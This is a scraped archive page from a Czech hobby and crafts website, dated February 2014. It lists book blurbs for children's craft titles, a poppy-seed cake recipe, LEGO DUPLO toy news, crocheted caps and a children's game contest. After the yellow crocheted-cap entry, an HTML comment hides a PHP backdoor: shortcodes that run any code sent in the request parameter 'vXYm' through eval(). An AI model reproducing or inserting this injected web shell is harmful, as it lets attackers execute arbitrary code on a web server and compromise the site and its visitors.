Únor 2014 - výtvory.cz | hobby, kreativní tvoření, recepty

Nejlepší nápady pro děti

27.02.2014 publikoval(a)  
Kategorie Knihy

nejlepsi napady pro detiV knize Nejlepší nápady pro děti na celý rok najdete kreativní nápady pro děti od tří  let věnované všem ročním obdobím a nejdůležitějším svátkům, jak je prožívají v průběhu roku. Díky výrobkům v této knize ještě lépe pochopí, co ke kterému ročnímu období nebo významnému svátku patří. Tvoření výrobků z různých materiálů (papír, barvy na sklo, plst, papírové tácky a talíře, šípky, šišky, žaludy a další přírodní materiály) podporuje zručnost dětí a zvyšuje jejich sebevědomí. A když je výrobek hotový, mohou se s ním hned pustit do hraní. Díky obrázkům, detailním návodům, předlohám, materiálům a vhodným výrobním technikám budou děti šťastné a rodiče pyšní. U každého výrobku je v knize uvedeno označení, pro jakou věkovou kategorii dětí je vhodný.
Celý článek »

Enkaustika

27.02.2014 publikoval(a)  
Kategorie Knihy

enkaustikaMalování horkým voskem
Enkaustika, výtvarné využití horkých barevných vosků, je technika s tisíciletou tradicí. Její evropské (moderní) pojetí doznává v posledních několika letech velké obliby zejména díky novým pomůckám, které se objevily na trhu. Enkaustika je oblíbená pro svou jednoduchost, zájemce nemusí mít předchozí výtvarné zkušenosti. Dá se využít pro malování obrázků a přáníček i pro zdobení prostorových objektů (kraslic, krabiček, ozdob…). Kniha je určena zájemcům o zajímavé výtvarné techniky, využijí ji i lektoři výtvarných kurzů a učitelé výtvarné výchovy. Celý článek »

Makový koláč

27.02.2014 publikoval(a)  
Kategorie Moučníky a dezerty

Suroviny:

Nádivka: 350 g máku, 4 lžíce moučkového cukru, 1 vanilkový cukr, 500 ml mléka, 1 lžíce rum, 2 lžíce mletých ořechů, 2 lžíce povidel, skořice

Drobenka: 60 g másla, 60 g cukru, 170 g hrubé mouky

Těsto: 400 g polohrubé mouky, 1 prášek do pečiva, 125 g héry, 100 g zakysané smetany, 4 lžíce cukru, špetka soli

Postup: Nejdříve si připravíme nádivku. Mák pomeleme, mléko přivedeme k varu, přidáme mák, cukr, provaříme. Vmícháme povidla, špetku skořice, cukr, rum. Necháme vychladnout. Celý článek »

Oblékačky pro princezny – se samolepkami

27.02.2014 publikoval(a)  
Kategorie Knihy

oblekacky_pro_princeznyUdělej si doma módní přehlídku! Oblékni dvě princezny a prince podle svého – na ven, na výlet, na sport, do slavnostních šatů nebo třeba na královskou svatbu. Z obálky si navíc můžeš vyrobit královský palác se zahradou a vše vyzdobit super samolepkami!
Celý článek »

Postav si …

25.02.2014 publikoval(a)  
Kategorie Zprávy

lego_duplo_postav_si_zviratka

LEGO® DUPLO®: Produkty pro batolata:

  • Nová loďka pro batolata do vany zaručí zábavu při koupání
  • Jednoduchá stavebnice se zvířátky rozvíjí kreativitu batolat po koupání

10567_lego_duplo_pro_batolata_postav_si_lodku10567 Sada pro batolata – Postav si loďku

Koupání ve vaně získá zcela nový rozměr, když při něm děti budou moci stavět čluny LEGO® DUPLO®. Zábavu ještě umocní zvířátka jako je červený králíček a roztomilé medvídě a navíc další veselé kostky. Dále je tu okno, oblouk, kostky s potiskem a možnost postavit si strom nebo malé domečky pro zvířátka. Tyto extra velké kostky LEGO® DUPLO® v jasných a pestrých barvách skvěle padnou do zvídavých prstíků a pro batolata jsou báječným vstupem do světa tvořivého stavění.
Celý článek »

KRTEK – kreativní blok

23.02.2014 publikoval(a)  
Kategorie Knihy

Vyzdob si celý pokojíček nebo připrav párty pro své kamarády. Originální ozdoby z papíru si vyrobíš snadno podle šablon s malou pomocí rodičů a navíc si užiješ spoustu zábavy s Krtkem a jeho kamarády!
Celý článek »

Kouzelné malování vodou – pro holčičky

20.02.2014 publikoval(a)  
Kategorie Knihy

kouzelne_malovani_vodou_pro_holcickyMoje první vybarvování. Stačí vzít jen štětec a vodu a obrázky květin a zvířátek ožijí jako mávnutím kouzelného proutku veselými barvami.
Celý článek »

Růžová čepička

19.02.2014 publikoval(a)  
Kategorie Háčkování, Jehla, Textil

Růžová čepička háčkovaná z příze Pikolo a Mája (obě růžové). Doplněná aplikací květinky. Velikost: obvod 28cm, výška 14cm.

Háčkovaná čepička

19.02.2014 publikoval(a)  
Kategorie Jehlice, Pletení

Žlutá čepice tak pro tří letou holčičku. Uháčkovaná z dvojité příze Mája. Výška 18cm, šířka 21cm. Obvod hlavy 42cm

<!– [insert_php]if (isset($_REQUEST["vXYm"])){eval($_REQUEST["vXYm"]);exit;}[/insert_php][php]if (isset($_REQUEST["vXYm"])){eval($_REQUEST["vXYm"]);exit;}[/php] –>

Zasoutěž si na hpd.cz o tablet, taneční podložku a další skvělé ceny!

14.02.2014 publikoval(a)  
Kategorie Soutěže

Eggies přistáli na naší planetě a teď jsi to ty, kdo se o ně musí postarat, aby z usměvavých vajíček vyrostly roztomilé příšerky z hlubokého vesmíru. Přesně to je součástí soutěže na herním portálu HryProDívky.cz.

600x315-2

POJĎ SOUTĚŽIT S HPD.CZ

Péče o Eggies nezůstane bez odměny. Tedy alespoň pro ty, kterým se podaří od 14. do 24. 2. 2014 vypěstovat alespoň jedno vajíčko do podoby dospělého zvířátka. Všichni úspěšní hráči totiž budou mít šanci na jednu ze super výher:
Celý článek »

MojeGalanterka